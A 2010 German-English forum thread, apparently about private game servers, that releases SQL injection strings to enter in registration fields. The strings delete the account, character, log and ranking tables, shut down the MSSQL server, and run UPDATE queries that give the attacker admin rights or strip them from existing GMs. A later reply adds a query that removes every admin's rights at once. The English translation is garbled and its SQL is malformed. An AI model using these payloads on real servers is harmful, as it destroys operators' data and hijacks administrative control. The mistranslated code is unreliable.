[Release] SQL Injection Befehle

Fullscreen · 11/21/2010, 13:13

Heyho,

Deutsch:

ich hab für euch mal ein paar SQL Injection Befehle rausgesucht:

Quote:

Hier stelle ich mal eine kleine Auflistung der mir bisher bekannten Sql-Injections rein!

Quote:

';delete account_tbl;--

Löscht die Accountdatenbank

Quote:

';delete character_01_tbl;--

Löscht die Characterdatenbank

Quote:

';delete logging_01_tbl;--

Löscht die Loggdatenbank

Quote:

';delete ranking_tbl;--

Löscht die Rankingdatenbank

Quote:

';shutdown;--

Schließt die MSSQL Verbindung!

Quote:

USE [CHARACTER_01_DBF]

UPDATE CHARACTER_TBL SET m_chAuthority='Z'
WHERE m_szName='ACCOUNTID' and serverindex='01'

USE [ACCOUNT_DBF]

UPDATE ACCOUNT_TBL_DETAIL SET m_chLoginAuthority='Z'
WHERE account='CHARACTERNAME' and gamecode='A000'

Gibt deinen Charackter Adminrechte!

Damit kann man auch einen Admin GM oder sonstiges mit Ingamerrechten die rechte entziehen,mann muss nur jediglich die AccountID und den Characktername wissen und aus em 'Z' ein 'F' machen!

Wie das funktioniert?

Einfach den Code bei der Regristrierungsseite eingebe,wo normalerweise deine Accountid rein kommt!

Das ganze funktioniert nur, wenn die Serverbetreiber Sonderzeichen zulassen!

Das ganze wurde von Frucht auf Core geschrieben. Also Credits zu ihm!

Werde diesen Thread updaten, wenn neue bekannt sind!

English:

Quote:

Today I present a list of SQL injections!

Quote:

'; delete account_tbl ;--

Deletes the account database

Quote:

'; delete character_01_tbl, -

Deletes the character database

Quote:

'; delete logging_01_tbl, -

Clears the log database

Quote:

'; delete ranking_tbl, -

Deletes the ranking database

Quote:

'; shutdown ;--

Closes the MSSQL connection!

Quote:

USE [CHARACTER_01_DBF]

UPDATE SET CHARACTER_TBL m_chAuthority = 'Z'
WHERE m_szName = 'ACCOUNTID' and index server = '01 '

USE [ACCOUNT_DBF]

UPDATE SET ACCOUNT_TBL_DETAIL m_chLoginAuthority = 'Z'
WHERE account = 'CHARACTER NAME' and game code = 'A000'

Makes your character to the admin!

So you can also withdraw an admin or other GM Ingamerrechten with the right man only needs to know only the AccountID and Characktername and make the 'Z' a 'F'!

How does it work?

Simply enter the code in the Page tab type where normally your accountid comes in!

It works only if the Allow server operators, special symbols

The whole thing was written by fruit to score. So credits to him!

Will update this thread when new ones are announced!

Edit1: English Translation added!

Greez,

Fullscreen

Achileus · 11/25/2010, 19:41

xD muss man das einfach in login schreiben und passwort oder wie? Wenn das so einfach währe lach ich mich tot!

Und was ist GameCode?

Lightings · 11/25/2010, 21:49

Dann viel Spaß beim Lachen ,
nur jeder hat sonderzeichen raus!

Fullscreen · 11/26/2010, 13:35

das hier ist nur für N**b Server gedacht, die zu blöd sind, dass zu fixen.

Achileus · 11/26/2010, 14:30

Wollte mal Fragen für was sind die Befehle da? das man so einfach alles killen kann?

EDIT: Der Fixx ist auch einfach einfach weniger als 10 buchstaben zulassen das ist auch nen Fixx xD

Fullscreen · 11/26/2010, 21:20

das sind SQLs, also so etwas wie Batch Dateien auf Windows. Mit ihnen kannst du Servern sagen, was sie machen sollen. Da meist nur der Admin Zugriff auf die Server Database hat, kann er nur selbst Schaden verursachen.
Auf Servern, wo Sonderzeichen gesperrt sind und deine Methode angewandt wurde, geht das nicht.

Greez,

pekopon321 · 12/01/2010, 11:39

can you translate it to english? please?

Fullscreen · 12/01/2010, 14:08

Quote:

can you translate it to english? please?

Yes, sure

Skullpturra · 12/01/2010, 16:36

ganz nett aber ich denke solche "noob" server die du da in dem text erwähnst gibt es nicht oder nur ganz wenige : ) aber dennoch ...dadurch kann mann wirklich was lernen : ) ich meine nur die leute die einen eigenen server haben ... können sicher etwas damit anfangen
mfg. Skullptura

azizcrank · 12/01/2010, 21:50

ja toll,bringt sich ur was ...

Quote:

if(strlen($username) < 4 ||
strlen($username) > 10
{
die("Dein Benutzername ist zu kurz/lang . Er muss zwischen 4 und 10 Zeichen lang sein .");
}

der 'fix' xD

~~.CяeαTiVe~~ · 12/20/2010, 17:57

Nixda SQLi -.-
Das ist nur SQL!!
SQLi ist was ganz anderes!

Steav · 12/29/2010, 02:50

Quote:

Originally Posted by .CяeαTiVe

Nixda SQLi -.-
Das ist nur SQL!!
SQLi ist was ganz anderes!

will dich ja nur ungern enttäuschen... aber genau das ist sql injection^^

glitchz · 12/29/2010, 07:06

can someone that speaks english tell me what exactly this is...i cant really understand his translation

oberblubb · 12/31/2010, 15:35

Quote:

UPDATE CHARACTER_TBL SET m_chAuthority='F'
WHERE m_chAuthority='Z'

so kann man sehr effektiv allen Admins die Rechte nehmen... unabhängig vom Charnamen...

Achileus · 01/02/2011, 15:14

Wer lässt soviele buchstaben guten das einzigster was auf jeden p Server funtzt ist shutdown.